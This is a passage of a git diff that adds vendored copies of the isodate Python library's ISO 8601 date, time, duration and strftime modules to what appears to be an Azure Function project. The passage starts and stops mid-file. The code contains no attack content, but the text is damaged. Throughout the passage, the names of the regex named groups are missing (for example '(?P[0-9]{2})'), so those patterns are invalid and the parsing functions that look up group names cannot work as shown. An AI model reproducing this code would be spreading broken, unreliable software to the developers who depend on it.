arbitrary number of year + # digits with a leading +/- sign. + if expanded: + sign = 1 + else: + sign = 0 + # 1. complete dates: + # YYYY-MM-DD or +- YYYYYY-MM-DD... extended date format + cache_entry.append(re.compile(r"(?P[+-]){%d}(?P[0-9]{%d})" + r"-(?P[0-9]{2})-(?P[0-9]{2})" + % (sign, yeardigits))) + # YYYYMMDD or +- YYYYYYMMDD... basic date format + cache_entry.append(re.compile(r"(?P[+-]){%d}(?P[0-9]{%d})" + r"(?P[0-9]{2})(?P[0-9]{2})" + % (sign, yeardigits))) + # 2. complete week dates: + # YYYY-Www-D or +-YYYYYY-Www-D ... extended week date + cache_entry.append(re.compile(r"(?P[+-]){%d}(?P[0-9]{%d})" + r"-W(?P[0-9]{2})-(?P[0-9]{1})" + % (sign, yeardigits))) + # YYYYWwwD or +-YYYYYYWwwD ... basic week date + cache_entry.append(re.compile(r"(?P[+-]){%d}(?P[0-9]{%d})W" + r"(?P[0-9]{2})(?P[0-9]{1})" + % (sign, yeardigits))) + # 3. ordinal dates: + # YYYY-DDD or +-YYYYYY-DDD ... extended format + cache_entry.append(re.compile(r"(?P[+-]){%d}(?P[0-9]{%d})" + r"-(?P[0-9]{3})" + % (sign, yeardigits))) + # YYYYDDD or +-YYYYYYDDD ... basic format + cache_entry.append(re.compile(r"(?P[+-]){%d}(?P[0-9]{%d})" + r"(?P[0-9]{3})" + % (sign, yeardigits))) + # 4. week dates: + # YYYY-Www or +-YYYYYY-Www ... extended reduced accuracy week date + cache_entry.append(re.compile(r"(?P[+-]){%d}(?P[0-9]{%d})" + r"-W(?P[0-9]{2})" + % (sign, yeardigits))) + # YYYYWww or +-YYYYYYWww ... basic reduced accuracy week date + cache_entry.append(re.compile(r"(?P[+-]){%d}(?P[0-9]{%d})W" + r"(?P[0-9]{2})" + % (sign, yeardigits))) + # 5. month dates: + # YYY-MM or +-YYYYYY-MM ... reduced accuracy specific month + cache_entry.append(re.compile(r"(?P[+-]){%d}(?P[0-9]{%d})" + r"-(?P[0-9]{2})" + % (sign, yeardigits))) + # YYYMM or +-YYYYYYMM ... basic incomplete month date format + cache_entry.append(re.compile(r"(?P[+-]){%d}(?P[0-9]{%d})" + r"(?P[0-9]{2})" + % (sign, yeardigits))) + # 6. year dates: + # YYYY or +-YYYYYY ... reduced accuracy specific year + cache_entry.append(re.compile(r"(?P[+-]){%d}(?P[0-9]{%d})" + % (sign, yeardigits))) + # 7. century dates: + # YY or +-YYYY ... reduced accuracy specific century + cache_entry.append(re.compile(r"(?P[+-]){%d}" + r"(?P[0-9]{%d})" + % (sign, yeardigits - 2))) + + DATE_REGEX_CACHE[(yeardigits, expanded)] = cache_entry + return DATE_REGEX_CACHE[(yeardigits, expanded)] + + +def parse_date( + datestring, + yeardigits=4, expanded=False, defaultmonth=1, defaultday=1): + ''' + Parse an ISO 8601 date string into a datetime.date object. + + As the datetime.date implementation is limited to dates starting from + 0001-01-01, negative dates (BC) and year 0 can not be parsed by this + method. + + For incomplete dates, this method chooses the first day for it. For + instance if only a century is given, this method returns the 1st of + January in year 1 of this century. + + supported formats: (expanded formats are shown with 6 digits for year) + YYYYMMDD +-YYYYYYMMDD basic complete date + YYYY-MM-DD +-YYYYYY-MM-DD extended complete date + YYYYWwwD +-YYYYYYWwwD basic complete week date + YYYY-Www-D +-YYYYYY-Www-D extended complete week date + YYYYDDD +-YYYYYYDDD basic ordinal date + YYYY-DDD +-YYYYYY-DDD extended ordinal date + YYYYWww +-YYYYYYWww basic incomplete week date + YYYY-Www +-YYYYYY-Www extended incomplete week date + YYYMM +-YYYYYYMM basic incomplete month date + YYY-MM +-YYYYYY-MM incomplete month date + YYYY +-YYYYYY incomplete year date + YY +-YYYY incomplete century date + + @param datestring: the ISO date string to parse + @param yeardigits: how many digits are used to represent a year + @param expanded: if True then +/- signs are allowed. This parameter + is forced to True, if yeardigits != 4 + + @return: a datetime.date instance represented by datestring + @raise ISO8601Error: if this function can not parse the datestring + @raise ValueError: if datestring can not be represented by datetime.date + ''' + if yeardigits != 4: + expanded = True + isodates = build_date_regexps(yeardigits, expanded) + for pattern in isodates: + match = pattern.match(datestring) + if match: + groups = match.groupdict() + # sign, century, year, month, week, day, + # FIXME: negative dates not possible with python standard types + sign = (groups['sign'] == '-' and -1) or 1 + if 'century' in groups: + return date( + sign * (int(groups['century']) * 100 + 1), + defaultmonth, defaultday) + if 'month' not in groups: # weekdate or ordinal date + ret = date(sign * int(groups['year']), 1, 1) + if 'week' in groups: + isotuple = ret.isocalendar() + if 'day' in groups: + days = int(groups['day'] or 1) + else: + days = 1 + # if first week in year, do weeks-1 + return ret + timedelta(weeks=int(groups['week']) - + (((isotuple[1] == 1) and 1) or 0), + days=-isotuple[2] + days) + elif 'day' in groups: # ordinal date + return ret + timedelta(days=int(groups['day']) - 1) + else: # year date + return ret.replace(month=defaultmonth, day=defaultday) + # year-, month-, or complete date + if 'day' not in groups or groups['day'] is None: + day = defaultday + else: + day = int(groups['day']) + return date(sign * int(groups['year']), + int(groups['month']) or defaultmonth, day) + raise ISO8601Error('Unrecognised ISO 8601 date format: %r' % datestring) + + +def date_isoformat(tdate, format=DATE_EXT_COMPLETE, yeardigits=4): + ''' + Format date strings. + + This method is just a wrapper around isodate.isostrf.strftime and uses + Date-Extended-Complete as default format. + ''' + return strftime(tdate, format, yeardigits) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isodatetime.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isodatetime.py new file mode 100644 index 0000000..03289e7 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isodatetime.py @@ -0,0 +1,68 @@ +############################################################################## +# Copyright 2009, Gerhard Weis +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are met: +# +# * Redistributions of source code must retain the above copyright notice, +# this list of conditions and the following disclaimer. +# * Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# * Neither the name of the authors nor the names of its contributors +# may be used to endorse or promote products derived from this software +# without specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +# CONTRACT, STRICT LIABILITY, OR TORT +############################################################################## +''' +This module defines a method to parse an ISO 8601:2004 date time string. + +For this job it uses the parse_date and parse_time methods defined in date +and time module. +''' +from datetime import datetime + +from isodate.isostrf import strftime +from isodate.isostrf import DATE_EXT_COMPLETE, TIME_EXT_COMPLETE, TZ_EXT +from isodate.isodates import parse_date +from isodate.isoerror import ISO8601Error +from isodate.isotime import parse_time + + +def parse_datetime(datetimestring): + ''' + Parses ISO 8601 date-times into datetime.datetime objects. + + This function uses parse_date and parse_time to do the job, so it allows + more combinations of date and time representations, than the actual + ISO 8601:2004 standard allows. + ''' + try: + datestring, timestring = datetimestring.split('T') + except ValueError: + raise ISO8601Error("ISO 8601 time designator 'T' missing. Unable to" + " parse datetime string %r" % datetimestring) + tmpdate = parse_date(datestring) + tmptime = parse_time(timestring) + return datetime.combine(tmpdate, tmptime) + + +def datetime_isoformat(tdt, format=DATE_EXT_COMPLETE + 'T' + + TIME_EXT_COMPLETE + TZ_EXT): + ''' + Format datetime strings. + + This method is just a wrapper around isodate.isostrf.strftime and uses + Extended-Complete as default format. + ''' + return strftime(tdt, format) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isoduration.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isoduration.py new file mode 100644 index 0000000..30db224 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isoduration.py @@ -0,0 +1,151 @@ +############################################################################## +# Copyright 2009, Gerhard Weis +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are met: +# +# * Redistributions of source code must retain the above copyright notice, +# this list of conditions and the following disclaimer. +# * Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# * Neither the name of the authors nor the names of its contributors +# may be used to endorse or promote products derived from this software +# without specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +# CONTRACT, STRICT LIABILITY, OR TORT +############################################################################## +''' +This module provides an ISO 8601:2004 duration parser. + +It also provides a wrapper to strftime. This wrapper makes it easier to +format timedelta or Duration instances as ISO conforming strings. +''' +from datetime import timedelta +from decimal import Decimal +import re + +from six import string_types + +from isodate.duration import Duration +from isodate.isoerror import ISO8601Error +from isodate.isodatetime import parse_datetime +from isodate.isostrf import strftime, D_DEFAULT + +ISO8601_PERIOD_REGEX = re.compile( + r"^(?P[+-])?" + r"P(?!\b)" + r"(?P[0-9]+([,.][0-9]+)?Y)?" + r"(?P[0-9]+([,.][0-9]+)?M)?" + r"(?P[0-9]+([,.][0-9]+)?W)?" + r"(?P[0-9]+([,.][0-9]+)?D)?" + r"((?PT)(?P[0-9]+([,.][0-9]+)?H)?" + r"(?P[0-9]+([,.][0-9]+)?M)?" + r"(?P[0-9]+([,.][0-9]+)?S)?)?$") +# regular expression to parse ISO duartion strings. + + +def parse_duration(datestring): + """ + Parses an ISO 8601 durations into datetime.timedelta or Duration objects. + + If the ISO date string does not contain years or months, a timedelta + instance is returned, else a Duration instance is returned. + + The following duration formats are supported: + -PnnW duration in weeks + -PnnYnnMnnDTnnHnnMnnS complete duration specification + -PYYYYMMDDThhmmss basic alternative complete date format + -PYYYY-MM-DDThh:mm:ss extended alternative complete date format + -PYYYYDDDThhmmss basic alternative ordinal date format + -PYYYY-DDDThh:mm:ss extended alternative ordinal date format + + The '-' is optional. + + Limitations: ISO standard defines some restrictions about where to use + fractional numbers and which component and format combinations are + allowed. This parser implementation ignores all those restrictions and + returns something when it is able to find all necessary components. + In detail: + it does not check, whether only the last component has fractions. + it allows weeks specified with all other combinations + + The alternative format does not support durations with years, months or + days set to 0. + """ + if not isinstance(datestring, string_types): + raise TypeError("Expecting a string %r" % datestring) + match = ISO8601_PERIOD_REGEX.match(datestring) + if not match: + # try alternative format: + if datestring.startswith("P"): + durdt = parse_datetime(datestring[1:]) + if durdt.year != 0 or durdt.month != 0: + # create Duration + ret = Duration(days=durdt.day, seconds=durdt.second, + microseconds=durdt.microsecond, + minutes=durdt.minute, hours=durdt.hour, + months=durdt.month, years=durdt.year) + else: # FIXME: currently not possible in alternative format + # create timedelta + ret = timedelta(days=durdt.day, seconds=durdt.second, + microseconds=durdt.microsecond, + minutes=durdt.minute, hours=durdt.hour) + return ret + raise ISO8601Error("Unable to parse duration string %r" % datestring) + groups = match.groupdict() + for key, val in groups.items(): + if key not in ('separator', 'sign'): + if val is None: + groups[key] = "0n" + # print groups[key] + if key in ('years', 'months'): + groups[key] = Decimal(groups[key][:-1].replace(',', '.')) + else: + # these values are passed into a timedelta object, + # which works with floats. + groups[key] = float(groups[key][:-1].replace(',', '.')) + if groups["years"] == 0 and groups["months"] == 0: + ret = timedelta(days=groups["days"], hours=groups["hours"], + minutes=groups["minutes"], seconds=groups["seconds"], + weeks=groups["weeks"]) + if groups["sign"] == '-': + ret = timedelta(0) - ret + else: + ret = Duration(years=groups["years"], months=groups["months"], + days=groups["days"], hours=groups["hours"], + minutes=groups["minutes"], seconds=groups["seconds"], + weeks=groups["weeks"]) + if groups["sign"] == '-': + ret = Duration(0) - ret + return ret + + +def duration_isoformat(tduration, format=D_DEFAULT): + ''' + Format duration strings. + + This method is just a wrapper around isodate.isostrf.strftime and uses + P%P (D_DEFAULT) as default format. + ''' + # TODO: implement better decision for negative Durations. + # should be done in Duration class in consistent way with timedelta. + if (((isinstance(tduration, Duration) and + (tduration.years < 0 or tduration.months < 0 or + tduration.tdelta < timedelta(0))) or + (isinstance(tduration, timedelta) and + (tduration < timedelta(0))))): + ret = '-' + else: + ret = '' + ret += strftime(tduration, format) + return ret diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isoerror.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isoerror.py new file mode 100644 index 0000000..7fb7880 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isoerror.py @@ -0,0 +1,33 @@ +############################################################################## +# Copyright 2009, Gerhard Weis +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are met: +# +# * Redistributions of source code must retain the above copyright notice, +# this list of conditions and the following disclaimer. +# * Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# * Neither the name of the authors nor the names of its contributors +# may be used to endorse or promote products derived from this software +# without specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +# CONTRACT, STRICT LIABILITY, OR TORT +############################################################################## +''' +This module defines all exception classes in the whole package. +''' + + +class ISO8601Error(ValueError): + '''Raised when the given ISO string can not be parsed.''' diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isostrf.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isostrf.py new file mode 100644 index 0000000..96b3dc4 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isostrf.py @@ -0,0 +1,214 @@ +############################################################################## +# Copyright 2009, Gerhard Weis +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are met: +# +# * Redistributions of source code must retain the above copyright notice, +# this list of conditions and the following disclaimer. +# * Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# * Neither the name of the authors nor the names of its contributors +# may be used to endorse or promote products derived from this software +# without specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +# CONTRACT, STRICT LIABILITY, OR TORT +############################################################################## +""" +This module provides an alternative strftime method. + +The strftime method in this module allows only a subset of Python's strftime +format codes, plus a few additional. It supports the full range of date values +possible with standard Python date/time objects. Furthermore there are several +pr-defined format strings in this module to make ease producing of ISO 8601 +conforming strings. +""" +import re +from datetime import date, timedelta + +from isodate.duration import Duration +from isodate.isotzinfo import tz_isoformat + +# Date specific format strings +DATE_BAS_COMPLETE = '%Y%m%d' +DATE_EXT_COMPLETE = '%Y-%m-%d' +DATE_BAS_WEEK_COMPLETE = '%YW%W%w' +DATE_EXT_WEEK_COMPLETE = '%Y-W%W-%w' +DATE_BAS_ORD_COMPLETE = '%Y%j' +DATE_EXT_ORD_COMPLETE = '%Y-%j' +DATE_BAS_WEEK = '%YW%W' +DATE_EXT_WEEK = '%Y-W%W' +DATE_BAS_MONTH = '%Y%m' +DATE_EXT_MONTH = '%Y-%m' +DATE_YEAR = '%Y' +DATE_CENTURY = '%C' + +# Time specific format strings +TIME_BAS_COMPLETE = '%H%M%S' +TIME_EXT_COMPLETE = '%H:%M:%S' +TIME_BAS_MINUTE = '%H%M' +TIME_EXT_MINUTE = '%H:%M' +TIME_HOUR = '%H' + +# Time zone formats +TZ_BAS = '%z' +TZ_EXT = '%Z' +TZ_HOUR = '%h' + +# DateTime formats +DT_EXT_COMPLETE = DATE_EXT_COMPLETE + 'T' + TIME_EXT_COMPLETE + TZ_EXT +DT_BAS_COMPLETE = DATE_BAS_COMPLETE + 'T' + TIME_BAS_COMPLETE + TZ_BAS +DT_EXT_ORD_COMPLETE = DATE_EXT_ORD_COMPLETE + 'T' + TIME_EXT_COMPLETE + TZ_EXT +DT_BAS_ORD_COMPLETE = DATE_BAS_ORD_COMPLETE + 'T' + TIME_BAS_COMPLETE + TZ_BAS +DT_EXT_WEEK_COMPLETE = (DATE_EXT_WEEK_COMPLETE + 'T' + + TIME_EXT_COMPLETE + TZ_EXT) +DT_BAS_WEEK_COMPLETE = (DATE_BAS_WEEK_COMPLETE + 'T' + + TIME_BAS_COMPLETE + TZ_BAS) + +# Duration formts +D_DEFAULT = 'P%P' +D_WEEK = 'P%p' +D_ALT_EXT = 'P' + DATE_EXT_COMPLETE + 'T' + TIME_EXT_COMPLETE +D_ALT_BAS = 'P' + DATE_BAS_COMPLETE + 'T' + TIME_BAS_COMPLETE +D_ALT_EXT_ORD = 'P' + DATE_EXT_ORD_COMPLETE + 'T' + TIME_EXT_COMPLETE +D_ALT_BAS_ORD = 'P' + DATE_BAS_ORD_COMPLETE + 'T' + TIME_BAS_COMPLETE + +STRF_DT_MAP = {'%d': lambda tdt, yds: '%02d' % tdt.day, + '%f': lambda tdt, yds: '%06d' % tdt.microsecond, + '%H': lambda tdt, yds: '%02d' % tdt.hour, + '%j': lambda tdt, yds: '%03d' % (tdt.toordinal() - + date(tdt.year, + 1, 1).toordinal() + + 1), + '%m': lambda tdt, yds: '%02d' % tdt.month, + '%M': lambda tdt, yds: '%02d' % tdt.minute, + '%S': lambda tdt, yds: '%02d' % tdt.second, + '%w': lambda tdt, yds: '%1d' % tdt.isoweekday(), + '%W': lambda tdt, yds: '%02d' % tdt.isocalendar()[1], + '%Y': lambda tdt, yds: (((yds != 4) and '+') or '') + + (('%%0%dd' % yds) % tdt.year), + '%C': lambda tdt, yds: (((yds != 4) and '+') or '') + + (('%%0%dd' % (yds - 2)) % + (tdt.year / 100)), + '%h': lambda tdt, yds: tz_isoformat(tdt, '%h'), + '%Z': lambda tdt, yds: tz_isoformat(tdt, '%Z'), + '%z': lambda tdt, yds: tz_isoformat(tdt, '%z'), + '%%': lambda tdt, yds: '%'} + +STRF_D_MAP = {'%d': lambda tdt, yds: '%02d' % tdt.days, + '%f': lambda tdt, yds: '%06d' % tdt.microseconds, + '%H': lambda tdt, yds: '%02d' % (tdt.seconds / 60 / 60), + '%m': lambda tdt, yds: '%02d' % tdt.months, + '%M': lambda tdt, yds: '%02d' % ((tdt.seconds / 60) % 60), + '%S': lambda tdt, yds: '%02d' % (tdt.seconds % 60), + '%W': lambda tdt, yds: '%02d' % (abs(tdt.days / 7)), + '%Y': lambda tdt, yds: (((yds != 4) and '+') or '') + + (('%%0%dd' % yds) % tdt.years), + '%C': lambda tdt, yds: (((yds != 4) and '+') or '') + + (('%%0%dd' % (yds - 2)) % + (tdt.years / 100)), + '%%': lambda tdt, yds: '%'} + + +def _strfduration(tdt, format, yeardigits=4): + ''' + this is the work method for timedelta and Duration instances. + + see strftime for more details. + ''' + def repl(match): + ''' + lookup format command and return corresponding replacement. + ''' + if match.group(0) in STRF_D_MAP: + return STRF_D_MAP[match.group(0)](tdt, yeardigits) + elif match.group(0) == '%P': + ret = [] + if isinstance(tdt, Duration): + if tdt.years: + ret.append('%sY' % abs(tdt.years)) + if tdt.months: + ret.append('%sM' % abs(tdt.months)) + usecs = abs((tdt.days * 24 * 60 * 60 + tdt.seconds) * 1000000 + + tdt.microseconds) + seconds, usecs = divmod(usecs, 1000000) + minutes, seconds = divmod(seconds, 60) + hours, minutes = divmod(minutes, 60) + days, hours = divmod(hours, 24) + if days: + ret.append('%sD' % days) + if hours or minutes or seconds or usecs: + ret.append('T') + if hours: + ret.append('%sH' % hours) + if minutes: + ret.append('%sM' % minutes) + if seconds or usecs: + if usecs: + ret.append(("%d.%06d" % (seconds, usecs)).rstrip('0')) + else: + ret.append("%d" % seconds) + ret.append('S') + # at least one component has to be there. + return ret and ''.join(ret) or '0D' + elif match.group(0) == '%p': + return str(abs(tdt.days // 7)) + 'W' + return match.group(0) + return re.sub('%d|%f|%H|%m|%M|%S|%W|%Y|%C|%%|%P|%p', repl, + format) + + +def _strfdt(tdt, format, yeardigits=4): + ''' + this is the work method for time and date instances. + + see strftime for more details. + ''' + def repl(match): + ''' + lookup format command and return corresponding replacement. + ''' + if match.group(0) in STRF_DT_MAP: + return STRF_DT_MAP[match.group(0)](tdt, yeardigits) + return match.group(0) + return re.sub('%d|%f|%H|%j|%m|%M|%S|%w|%W|%Y|%C|%z|%Z|%h|%%', repl, + format) + + +def strftime(tdt, format, yeardigits=4): + '''Directive Meaning Notes + %d Day of the month as a decimal number [01,31]. + %f Microsecond as a decimal number [0,999999], zero-padded + on the left (1) + %H Hour (24-hour clock) as a decimal number [00,23]. + %j Day of the year as a decimal number [001,366]. + %m Month as a decimal number [01,12]. + %M Minute as a decimal number [00,59]. + %S Second as a decimal number [00,61]. (3) + %w Weekday as a decimal number [0(Monday),6]. + %W Week number of the year (Monday as the first day of the week) + as a decimal number [00,53]. All days in a new year preceding the + first Monday are considered to be in week 0. (4) + %Y Year with century as a decimal number. [0000,9999] + %C Century as a decimal number. [00,99] + %z UTC offset in the form +HHMM or -HHMM (empty string if the + object is naive). (5) + %Z Time zone name (empty string if the object is naive). + %P ISO8601 duration format. + %p ISO8601 duration format in weeks. + %% A literal '%' character. + + ''' + if isinstance(tdt, (timedelta, Duration)): + return _strfduration(tdt, format, yeardigits) + return _strfdt(tdt, format, yeardigits) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isotime.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isotime.py new file mode 100644 index 0000000..5ac7f07 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isotime.py @@ -0,0 +1,158 @@ +############################################################################## +# Copyright 2009, Gerhard Weis +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are met: +# +# * Redistributions of source code must retain the above copyright notice, +# this list of conditions and the following disclaimer. +# * Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# * Neither the name of the authors nor the names of its contributors +# may be used to endorse or promote products derived from this software +# without specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +# CONTRACT, STRICT LIABILITY, OR TORT +############################################################################## +''' +This modules provides a method to parse an ISO 8601:2004 time string to a +Python datetime.time instance. + +It supports all basic and extended formats including time zone specifications +as described in the ISO standard. +''' +import re +from decimal import Decimal +from datetime import time + +from isodate.isostrf import strftime, TIME_EXT_COMPLETE, TZ_EXT +from isodate.isoerror import ISO8601Error +from isodate.isotzinfo import TZ_REGEX, build_tzinfo + +TIME_REGEX_CACHE = [] +# used to cache regular expressions to parse ISO time strings. + + +def build_time_regexps(): + ''' + Build regular expressions to parse ISO time string. + + The regular expressions are compiled and stored in TIME_REGEX_CACHE + for later reuse. + ''' + if not TIME_REGEX_CACHE: + # ISO 8601 time representations allow decimal fractions on least + # significant time component. Command and Full Stop are both valid + # fraction separators. + # The letter 'T' is allowed as time designator in front of a time + # expression. + # Immediately after a time expression, a time zone definition is + # allowed. + # a TZ may be missing (local time), be a 'Z' for UTC or a string of + # +-hh:mm where the ':mm' part can be skipped. + # TZ information patterns: + # '' + # Z + # +-hh:mm + # +-hhmm + # +-hh => + # isotzinfo.TZ_REGEX + # 1. complete time: + # hh:mm:ss.ss ... extended format + TIME_REGEX_CACHE.append(re.compile(r"T?(?P[0-9]{2}):" + r"(?P[0-9]{2}):" + r"(?P[0-9]{2}" + r"([,.][0-9]+)?)" + TZ_REGEX)) + # hhmmss.ss ... basic format + TIME_REGEX_CACHE.append(re.compile(r"T?(?P[0-9]{2})" + r"(?P[0-9]{2})" + r"(?P[0-9]{2}" + r"([,.][0-9]+)?)" + TZ_REGEX)) + # 2. reduced accuracy: + # hh:mm.mm ... extended format + TIME_REGEX_CACHE.append(re.compile(r"T?(?P[0-9]{2}):" + r"(?P[0-9]{2}" + r"([,.][0-9]+)?)" + TZ_REGEX)) + # hhmm.mm ... basic format + TIME_REGEX_CACHE.append(re.compile(r"T?(?P[0-9]{2})" + r"(?P[0-9]{2}" + r"([,.][0-9]+)?)" + TZ_REGEX)) + # hh.hh ... basic format + TIME_REGEX_CACHE.append(re.compile(r"T?(?P[0-9]{2}" + r"([,.][0-9]+)?)" + TZ_REGEX)) + return TIME_REGEX_CACHE + + +def parse_time(timestring): + ''' + Parses ISO 8601 times into datetime.time objects. + + Following ISO 8601 formats are supported: + (as decimal separator a ',' or a '.' is allowed) + hhmmss.ssTZD basic complete time + hh:mm:ss.ssTZD extended compelte time + hhmm.mmTZD basic reduced accuracy time + hh:mm.mmTZD extended reduced accuracy time + hh.hhTZD basic reduced accuracy time + TZD is the time zone designator which can be in the following format: + no designator indicates local time zone + Z UTC + +-hhmm basic hours and minutes + +-hh:mm extended hours and minutes + +-hh hours + ''' + isotimes = build_time_regexps() + for pattern in isotimes: + match = pattern.match(timestring) + if match: + groups = match.groupdict() + for key, value in groups.items(): + if value is not None: + groups[key] = value.replace(',', '.') + tzinfo = build_tzinfo(groups['tzname'], groups['tzsign'], + int(groups['tzhour'] or 0), + int(groups['tzmin'] or 0)) + if 'second' in groups: + # round to microseconds if fractional seconds are more precise + second = Decimal(groups['second']).quantize(Decimal('.000001')) + microsecond = (second - int(second)) * int(1e6) + # int(...) ... no rounding + # to_integral() ... rounding + return time(int(groups['hour']), int(groups['minute']), + int(second), int(microsecond.to_integral()), + tzinfo) + if 'minute' in groups: + minute = Decimal(groups['minute']) + second = (minute - int(minute)) * 60 + microsecond = (second - int(second)) * int(1e6) + return time(int(groups['hour']), int(minute), int(second), + int(microsecond.to_integral()), tzinfo) + else: + microsecond, second, minute = 0, 0, 0 + hour = Decimal(groups['hour']) + minute = (hour - int(hour)) * 60 + second = (minute - int(minute)) * 60 + microsecond = (second - int(second)) * int(1e6) + return time(int(hour), int(minute), int(second), + int(microsecond.to_integral()), tzinfo) + raise ISO8601Error('Unrecognised ISO 8601 time format: %r' % timestring) + + +def time_isoformat(ttime, format=TIME_EXT_COMPLETE + TZ_EXT): + ''' + Format time strings. + + This method is just a wrapper around isodate.isostrf.strftime and uses + Time-Extended-Complete with extended time zone as default format. + ''' + return strftime(ttime, format) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isotzinfo.py 